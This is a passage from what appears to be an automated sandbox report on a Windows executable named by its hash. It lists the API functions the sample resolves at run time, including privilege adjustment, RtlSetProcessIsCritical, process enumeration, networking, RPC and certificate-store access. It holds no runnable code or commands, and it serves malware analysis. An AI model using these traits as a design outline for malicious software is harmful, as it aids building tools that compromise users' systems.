\"GetProcAddress\" with a parameter ND_RU1 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ND_RU1_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetFontUnit (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetFontSize (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetFontStyle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetFamily (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ReleaseDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipCreateFromHDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetDpiY (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetFontHeight (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetEmHeight (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetLineSpacing (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipDeleteGraphics (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipCreateFont (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipDeleteFont (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GdipGetLogFontW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ND_WU1 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ND_WU1_RetAddr (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateFontIndirect (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateFontIndirectW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SelectObject (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetTextMetricsW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetTextExtentPoint32W (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeleteDC (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegSetValueEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RtlSetProcessIsCritical (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FindFirstFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FindNextFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FindNextFileW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserName (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserNameW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetUserNameExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CopyFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CopyFileW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RasEnumConnections (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RasEnumConnectionsW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSASocket (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSAEventSelect (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotification (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotificationW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter TraceRegisterExA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter TracePrintfExA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegOpenCurrentUser (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegNotifyChangeKeyValue (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpOpen (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpOpenW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandleW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeouts (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeoutsW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpGetIEProxyConfigForCurrentUser (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CoWaitForMultipleHandles (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpGetProxyForUrl (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WinHttpGetProxyForUrlW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcAsyncInitializeHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter NdrAsyncClientCall (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter RpcAsyncCompleteCall (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetNetworkParams (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter WSAConnect (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter EnumerateSecurityPackagesW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeContextBuffer (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter FreeCredentialsHandle (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter AcquireCredentialsHandleW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter DeleteSecurityContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityContextW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslOpenProvider (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetHashInterface (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslIncrementProviderReferenceCount (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslImportKey (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter GetCipherInterface (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter QueryContextAttributesW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslLookupCipherSuiteInfo (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter SslLookupCipherLengths (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertFreeCertificateContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateContext (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertGetCertificateContextProperty (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateCertificateContextW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertCloseStore (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateStore (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertDuplicateStoreW (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertEnumCertificatesInStore (UID: 00000000-00005932)\n \"11762e9e3553dd6ad102461e573f1e35e0fee399224bbe3567575fe26c3c7ab4.exe\" called \"GetProcAddress\" with a parameter CertEnumCertificatesInStoreW (UID: 00000000-00005932)\n 